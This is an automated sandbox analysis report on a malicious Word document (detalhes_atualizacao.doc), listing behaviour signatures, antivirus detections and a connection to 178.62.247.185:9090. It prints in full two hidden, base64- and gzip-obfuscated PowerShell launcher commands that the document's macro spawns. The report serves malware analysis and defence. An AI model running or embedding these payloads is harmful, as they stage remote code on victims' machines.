CreateProcessInternalW Aug. 1, 2022, 12:30 p.m.	thread_identifier: 2060 thread_handle: 0x00000450 process_identifier: 2076 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAPtN2ECA7VWaW/bOBD9nAD5D0JhQBLqWPLRIwEKLCWfrQ/ZSnzWKBiJlhhToitRcZxu//sObTlNt2nRLrCCD3I4M5x58zjUKos9QXms4IHy5ez0xMEJjhSt4N8XlcJtR+gnJyAtBK+Vd4q2QJtNnUeYxsvLSztLEhKLw7zUIgKlKYluGCWppit/K5OQJOR8cHNLPKF8UQqfSi3GbzDL1XY29kKinKPYl2td7mEZR8ndMCo09eNHVV+cl5elxucMs1RT3V0qSFTyGVN15asuN7zabYim9qiX8JSvRGlC42qldB2neEX64O2O9IgIuZ+qOuQAn4SILIkVyEaaHxY1FYZOwj3k+wlJU7WoLKTjxXL5l7bIdx1lsaARKXViQRK+cUlyRz2Slto49hkZkdUSrFyR0DhY6jqo3fE10QpxxlhR+RM3Wp9sj5j9rpH21Ai0HJHoRSjhD1n2uJ8xcrBTnwkTiq7DkxceMPt6dnp2unpkyKunDIHRyWI/JhCX5vCU7rXeKWZR6cEeWPBkB9PCVZIRffmIqlIgZq/4c/PyURc0H25AsBhz6i/BIK9iwV9/kuKfk7FOVjQm9V2MI+od+aY9hy1ZMbLPrnRU60NEmpovEL9OGAmwkHjJEv9g1oioeLS1Msp8kiAP6pNCVFA6/ftgDiXQ1E7cIxHgc5gD5worYDk5aufM3h13l3NQUm2G07SoOBkcM6+ouAQz4hcVFKc0X0KZ4Puh+i3cXsYE9XAqju6Weg5jvp3N41QkmQcVg9Sv3A3xKGYSiaLSpj6xdi4Njtuqz+JgY8aA/eDpDuoAEpm/KyQPEohQ1lwvuUR0og0jEajsT3uT4QDOdk7xPW9wQHz1X/EdOXwgrATiiMCT6KC6LuOiqIxpIqBnSFAfbv7T1k9ahQzCTkheA+14KBbWTkgyFzgmDUuyMYdkD0AiIPlmwiMLp+R17dAYtBfGgDoInlm97VIyXtNyZwvfHnyve6uXXY8GjjB51PPs1Gk13yK6Dbbe2z7y/Pc+uXDHNeE2OsJ2UHtITasWepZ5JcflIEB+H2TBLPSY6TTW90YtNem2PZG+Dj68Wq09NVG1WhtUzTXANgO7NdhFdHvfhTF0wEHX6qSW2WGN9/boZlJpziesbdSa4WrCU/f1rG4YxoWP670dQhb3q73dtDziV20vsmoxNy7s2ho1ELLjxrhp8Q8zK0GOMcbBhqe3b6rZJLCRPbApmQ+vm9Zw2LTQdev2c/3CCIyLyRSH1mRcofPNdBTCvLltDz8YZq3jkwc+3wJwLY5wMAKdwK544Qp06i+R9bLP0wpeWxxZoNOcf0atcLZpOgzWr64rHI1Zf4pRd75rGkZ55tRQ2+STVoCGoI4Da4hReld/qBvlsc/9yav+bGWMp+yNUbeHTjiVORubSP5u2/UP3ry89QZv3nYndBxxdG0Y4xeSM0CawqYuRt4TMvysdfdwkoaYAUmgKx8PZZMnzbzVOpxKC02DS3lNkpgwuNfg5jtSGzHGPdnjoSXD7XLo+fIKuoZhtfLsSFceFfVvvf8ourycQ4RwWPZ8LnVJHIiwaN5XTRPauXlfMyHH30/L5puddvBVlPfBAZlH92zvXpcHqcD8vvV/QpYf3hD+/F9D9k32i9XfgtEs5gn/IP9e8EeY/mHeE0wF6LnQeRg53HrPpZ+T48nbgCwIVH6VP/JVbpCJ8z68JJyd/gMBS99GLwoAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000045c	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 1, 2022, 12:30 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Aug. 1, 2022, 12:30 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

178.62.247.185

Creates suspicious VBA object (1 event)

com_class

Wscript.Shell

May attempt to create new processes

Libraries known to be associated with a CVE were requested (may be False Positive) (1 event)

cve	CVE-2013-3906

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAPtN2ECA7VWaW/bOBD9nAD5D0JhQBLqWPLRIwEKLCWfrQ/ZSnzWKBiJlhhToitRcZxu//sObTlNt2nRLrCCD3I4M5x58zjUKos9QXms4IHy5ez0xMEJjhSt4N8XlcJtR+gnJyAtBK+Vd4q2QJtNnUeYxsvLSztLEhKLw7zUIgKlKYluGCWppit/K5OQJOR8cHNLPKF8UQqfSi3GbzDL1XY29kKinKPYl2td7mEZR8ndMCo09eNHVV+cl5elxucMs1RT3V0qSFTyGVN15asuN7zabYim9qiX8JSvRGlC42qldB2neEX64O2O9IgIuZ+qOuQAn4SILIkVyEaaHxY1FYZOwj3k+wlJU7WoLKTjxXL5l7bIdx1lsaARKXViQRK+cUlyRz2Slto49hkZkdUSrFyR0DhY6jqo3fE10QpxxlhR+RM3Wp9sj5j9rpH21Ai0HJHoRSjhD1n2uJ8xcrBTnwkTiq7DkxceMPt6dnp2unpkyKunDIHRyWI/JhCX5vCU7rXeKWZR6cEeWPBkB9PCVZIRffmIqlIgZq/4c/PyURc0H25AsBhz6i/BIK9iwV9/kuKfk7FOVjQm9V2MI+od+aY9hy1ZMbLPrnRU60NEmpovEL9OGAmwkHjJEv9g1oioeLS1Msp8kiAP6pNCVFA6/ftgDiXQ1E7cIxHgc5gD5worYDk5aufM3h13l3NQUm2G07SoOBkcM6+ouAQz4hcVFKc0X0KZ4Puh+i3cXsYE9XAqju6Weg5jvp3N41QkmQcVg9Sv3A3xKGYSiaLSpj6xdi4Njtuqz+JgY8aA/eDpDuoAEpm/KyQPEohQ1lwvuUR0og0jEajsT3uT4QDOdk7xPW9wQHz1X/EdOXwgrATiiMCT6KC6LuOiqIxpIqBnSFAfbv7T1k9ahQzCTkheA+14KBbWTkgyFzgmDUuyMYdkD0AiIPlmwiMLp+R17dAYtBfGgDoInlm97VIyXtNyZwvfHnyve6uXXY8GjjB51PPs1Gk13yK6Dbbe2z7y/Pc+uXDHNeE2OsJ2UHtITasWepZ5JcflIEB+H2TBLPSY6TTW90YtNem2PZG+Dj68Wq09NVG1WhtUzTXANgO7NdhFdHvfhTF0wEHX6qSW2WGN9/boZlJpziesbdSa4WrCU/f1rG4YxoWP670dQhb3q73dtDziV20vsmoxNy7s2ho1ELLjxrhp8Q8zK0GOMcbBhqe3b6rZJLCRPbApmQ+vm9Zw2LTQdev2c/3CCIyLyRSH1mRcofPNdBTCvLltDz8YZq3jkwc+3wJwLY5wMAKdwK544Qp06i+R9bLP0wpeWxxZoNOcf0atcLZpOgzWr64rHI1Zf4pRd75rGkZ55tRQ2+STVoCGoI4Da4hReld/qBvlsc/9yav+bGWMp+yNUbeHTjiVORubSP5u2/UP3ry89QZv3nYndBxxdG0Y4xeSM0CawqYuRt4TMvysdfdwkoaYAUmgKx8PZZMnzbzVOpxKC02DS3lNkpgwuNfg5jtSGzHGPdnjoSXD7XLo+fIKuoZhtfLsSFceFfVvvf8ourycQ4RwWPZ8LnVJHIiwaN5XTRPauXlfMyHH30/L5puddvBVlPfBAZlH92zvXpcHqcD8vvV/QpYf3hD+/F9D9k32i9XfgtEs5gn/IP9e8EeY/mHeE0wF6LnQeRg53HrPpZ+T48nbgCwIVH6VP/JVbpCJ8z68JJyd/gMBS99GLwoAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
parent_process	winword.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBBAFAAdABOADIARQBDAEEANwBWAFcAYQBXAC8AYgBPAEIARAA5AG4AQQBEADUARAAwAEoAaABRAEIATABxAFcAUABMAFIASQB3AEUASwBMAEMAVwBmAHIAUQAvAFoAUwBuAHoAVwBLAEIAaQBKAGwAaABoAFQAbwBpAHQAUgBjAFoAeAB1AC8ALwBzAE8AYgBUAGwATgB0ADIAbgBSAEwAcgBDAEMARAAzAEkANABNADUAeAA1ADgAegBqAFUASwBvAHMAOQBRAFgAbQBzADQASQBIAHkANQBlAHoAMAB4AE0ARQBKAGoAaABTAHQANABOADgAWABsAGMASgB0AFIAKwBnAG4ASgB5AEEAdABCAEsAKwBWAGQANABxADIAUQBKAHQATgBuAFUAZQBZAHgAcwB2AEwAUwB6AHQATABFAGgASwBMAHcANwB6AFUASQBnAEsAbABLAFkAbAB1AEcAQwBXAHAAcABpAHQALwBLADUATwBRAEoATwBSADgAYwBIAE4ATABQAEsARgA4AFUAUQBxAGYAUwBpADMARwBiAHoARABMADEAWABZADIAOQBrAEsAaQBuAEsAUABZAGwAMgB0AGQANwBtAEUAWgBSADgAbgBkAE0AQwBvADAAOQBlAE4ASABWAFYAKwBjAGwANQBlAGwAeAB1AGMATQBzADEAUgBUADMAVgAwAHEAUwBGAFQAeQBHAFYATgAxADUAYQBzAHUATgA3AHoAYQBiAFkAaQBtADkAcQBpAFgAOABKAFMAdgBSAEcAbABDADQAMgBxAGwAZABCADIAbgBlAEUAWAA2ADQATwAyAE8AOQBJAGcASQB1AFoAKwBxAE8AdQBRAEEAbgA0AFMASQBMAEkAawBWAHkARQBhAGEASAB4AFkAMQBGAFkAWgBPAHcAagAzAGsAKwB3AGwASgBVADcAVwBvAEwASwBUAGoAeABYAEwANQBsADcAYgBJAGQAeAAxAGwAcwBhAEEAUgBLAFgAVgBpAFEAUgBLACsAYwBVAGwAeQBSAHoAMgBTAGwAdABvADQAOQBoAGsAWgBrAGQAVQBTAHIARgB5AFIAMABEAGgAWQA2AGoAcQBvADMAZgBFADEAMABRAHAAeAB4AGwAaABSACsAUgBNADMAVwBwADkAcwBqADUAagA5AHIAcABIADIAMQBBAGkAMABIAEoASABvAFIAUwBqAGgARAAxAG4AMgB1AEoAOAB4AGMAcgBCAFQAbgB3AGsAVABpAHEANwBEAGsAeABjAGUATQBQAHQANgBkAG4AcAAyAHUAbgBwAGsAeQBLAHUAbgBEAEkASABSAHkAVwBJAC8ASgBoAEMAWAA1AHYAQwBVADcAcgBYAGUASwBXAFoAUgA2AGMARQBlAFcAUABCAGsAQgA5AFAAQwBWAFoASQBSAGYAZgBtAEkAcQBsAEkAZwBaAHEALwA0AGMALwBQAHkAVQBSAGMAMABIADIANQBBAHMAQgBoAHoANgBpAC8AQgBJAEsAOQBpAHcAVgA5AC8AawB1AEsAZgBrADcARgBPAFYAagBRAG0AOQBWADIATQBJACsAbwBkACsAYQBZADkAaAB5ADEAWgBNAGIATABQAHIAbgBSAFUANgAwAE4ARQBtAHAAbwB2AEUATAA5AE8ARwBBAG0AdwBrAEgAagBKAEUAdgA5AGcAMQBvAGkAbwBlAEwAUwAxAE0AcwBwADgAawBpAEEAUAA2AHAATgBDAFYARgBBADYALwBmAHQAZwBEAGkAWABRADEARQA3AGMASQB4AEgAZwBjADUAZwBEADUAdwBvAHIAWQBEAGsANQBhAHUAZgBNADMAaAAxADMAbAAzAE4AUQBVAG0AMgBHADAANwBTAG8ATwBCAGsAYwBNADYAKwBvAHUAQQBRAHoANABoAGMAVgBGAEsAYwAwAFgAMABLAFoANABQAHUAaAArAGkAMwBjAFgAcwBZAEUAOQBYAEEAcQBqAHUANgBXAGUAZwA1AGoAdgBwADMATgA0ADEAUQBrAG0AUQBjAFYAZwA5AFMAdgAzAEEAMwB4AEsARwBZAFMAaQBhAEwAUwBwAGoANgB4AGQAaQA0AE4AagB0AHUAcQB6ACsASgBnAFkAOABhAEEALwBlAEQAcABEAHUAbwBBAEUAcABtAC8ASwB5AFEAUABFAG8AaABRADEAbAB3AHYAdQBVAFIAMABvAGcAMABqAEUAYQBqAHMAVAAzAHUAVAA0AFEARABPAGQAawA3AHgAUABXADkAdwBRAEgAegAxAFgALwBFAGQATwBYAHcAZwByAEEAVABpAGkATQBDAFQANgBLAEMANgBMAHUATwBpAHEASQB4AHAASQBxAEIAbgBTAEYAQQBmAGIAdgA3AFQAMQBrADkAYQBoAFEAegBDAFQAawBoAGUAQQArADEANABLAEIAYgBXAFQAawBnAHkARgB6AGcAbQBEAFUAdQB5AE0AWQBkAGsARAAwAEEAaQBJAFAAbABtAHcAaQBNAEwAcAArAFIAMQA3AGQAQQBZAHQAQgBmAEcAZwBEAG8ASQBuAGwAbQA5ADcAVgBJAHkAWAB0AE4AeQBaAHcAdgBmAEgAbgB5AHYAZQA2AHUAWABYAFkAOABHAGoAagBCADUAMQBQAFAAcwAxAEcAawAxADMAeQBLADYARABiAGIAZQAyAHoANwB5AC8AUABjACsAdQBYAEQASABOAGUARQAyAE8AcwBKADIAVQBIAHQASQBUAGEAcwBXAGUAcABaADUASgBjAGYAbABJAEUAQgArAEgAMgBUAEIATABQAFMAWQA2AFQAVABXADkAMABZAHQATgBlAG0AMgBQAFoARwArAEQAagA2ADgAVwBxADAAOQBOAFYARwAxAFcAaAB0AFUAegBUAFgAQQBOAGcATwA3AE4AZABoAEYAZABIAHYAZgBoAFQARgAwAHcARQBIAFgANgBxAFMAVwAyAFcARwBOADkALwBiAG8AWgBsAEoAcAB6AGkAZQBzAGIAZABTAGEANABXAHIAQwBVAC8AZgAxAHIARwA0AFkAeABvAFcAUAA2ADcAMABkAFEAaABiADMAcQA3ADMAZAB0AEQAegBpAFYAMgAwAHYAcwBtAG8AeABOAHkANwBzADIAaABvADEARQBMAEwAagB4AHIAaABwADgAUQA4AHoASwAwAEcATwBNAGMAYgBCAGgAcQBlADMAYgA2AHIAWgBKAEwAQwBSAFAAYgBBAHAAbQBRACsAdgBtADkAWgB3ADIATABUAFEAZABlAHYAMgBjAC8AMwBDAEMASQB5AEwAeQBSAFMASAAxAG0AUgBjAG8AZgBQAE4AZABCAFQAQwB2AEwAbAB0AEQAegA4AFkAWgBxADMAagBrAHcAYwArADMAdwBKAHcATABZADUAdwBNAEEASwBkAHcASwA1ADQANABRAHAAMAA2AGkAKwBSADkAYgBMAFAAMAB3AHAAZQBXAHgAeABaAG8ATgBPAGMAZgAwAGEAdABjAEwAWgBwAE8AZwB6AFcAcgA2ADQAcgBIAEkAMQBaAGYANABwAFIAZAA3ADUAcgBHAGsAWgA1ADUAdABSAFEAMgArAFMAVABWAG8AQwBHAG8ASQA0AEQAYQA0AGgAUgBlAGwAZAAvAHEAQgB2AGwAcwBjAC8AOQB5AGEAdgArAGIARwBXAE0AcAArAHkATgBVAGIAZQBIAFQAagBpAFYATwBSAHUAYgBTAFAANQB1ADIALwBVAFAAMwByAHkAOAA5AFEAWgB2ADMAbgBZAG4AZABCAHgAeABkAEcAMABZADQAeABlAFMATQAwAEMAYQB3AHEAWQB1AFIAdAA0AFQATQB2AHkAcwBkAGYAZAB3AGsAbwBhAFkAQQBVAG0AZwBLAHgAOABQAFoAWgBNAG4AegBiAHoAVgBPAHAAeABLAEMAMAAyAEQAUwAzAGwATgBrAHAAZwB3AHUATgBmAGcANQBqAHQAUwBHAHoASABHAFAAZABuAGoAbwBTAFgARAA3AFgATABvACsAZgBJAEsAdQBvAFoAaAB0AGYATABzAFMARgBjAGUARgBmAFYAdgB2AGYAOABvAHUAcgB5AGMAUQA0AFIAdwBXAFAAWgA4AEwAbgBWAEoASABJAGkAdwBhAE4ANQBYAFQAUgBQAGEAdQBYAGwAZgBNAHkASABIADMAMAAvAEwANQBwAHUAZABkAHYAQgBWAGwAUABmAEIAQQBaAGwASAA5ADIAegB2AFgAcABjAEgAcQBjAEQAOAB2AHYAVgAvAFEAcABZAGYAMwBoAEQAKwAvAEYAOQBEADkAawAzADIAaQA5AFgAZgBnAHQARQBzADUAZwBuAC8ASQBQADkAZQA4AEUAZQBZAC8AbQBIAGUARQAwAHcARgA2AEwAbgBRAGUAUgBnADUAMwBIAHIAUABwAFoAKwBUADQAOABuAGIAZwBDAHcASQBWAEgANgBWAFAALwBKAFYAYgBwAEMASgA4AHoANgA4AEoASgB5AGQALwBnAE0AQgBTADkAOQBHAEwAdwBvAEEAQQBBAD0APQAnACcAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=

Creates a suspicious Powershell process (4 events)

option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

178.62.247.185:9090

File has been identified by 38 AntiVirus engines on VirusTotal as malicious (38 events)

Lionic	Trojan.MSOffice.SAgent.4!c
Elastic	malicious (high confidence)
DrWeb	modification of W97M.Suspicious.1
MicroWorld-eScan	VB.Heur2.PwShell.2.8672C14A.Gen
FireEye	VB.Heur2.PwShell.2.8672C14A.Gen
CAT-QuickHeal	W97M.Downloader.36753
McAfee	W97M/Downloader.dsi
Sangfor	Malware.Generic-Macro.Save.092df8c2
Symantec	Downloader
ESET-NOD32	PowerShell/Rozena.AJ
TrendMicro-HouseCall	TROJ_FRS.0NA103I921
Avast	VBS:Agent-BUK [Trj]
ClamAV	Win.Trojan.PowerShell-8
Kaspersky	HEUR:Trojan.MSOffice.SAgent.gen
BitDefender	VB.Heur2.PwShell.2.8672C14A.Gen
NANO-Antivirus	Trojan.Macro.Downloader.fqlyhy
Rising	Heur.Macro.powershell.a (CLASSIC)
Ad-Aware	VB.Heur2.PwShell.2.8672C14A.Gen
TACHYON	Suspicious/W97M.Obfus.Gen.2
Sophos	Troj/DocDl-AEFQ
Comodo	Malware@#1bmfem2bvzkr
TrendMicro	TROJ_FRS.0NA103I921
McAfee-GW-Edition	BehavesLike.OLE2.Downloader.mg
Emsisoft	VB.Heur2.PwShell.2.8672C14A.Gen (B)
Ikarus	Trojan.PowerShell.Rozena
Avira	HEUR/Macro.Downloader.MRQR.Gen
Antiy-AVL	Trojan/Generic.ASMacro.2D3AB
Microsoft	TrojanDownloader:PowerShell/Bynoco!MTB
Gridinsoft	Trojan.U.Downloader.oa
ViRobot	DOC.Z.Agent.87040.SB
GData	VB.Heur2.PwShell.2.8672C14A.Gen
Cynet	Malicious (score: 99)
ALYac	Trojan.Downloader.DOC.Gen
MAX	malware (ai score=87)
Tencent	Heur.Macro.Generic.a.1fd5e5d1
SentinelOne	Static AI - Suspicious OLE
Fortinet	VBA/Agent.BUK!tr
AVG	VBS:Agent-BUK [Trj]

The processes winword.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

detalhes_atualizacao.doc

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All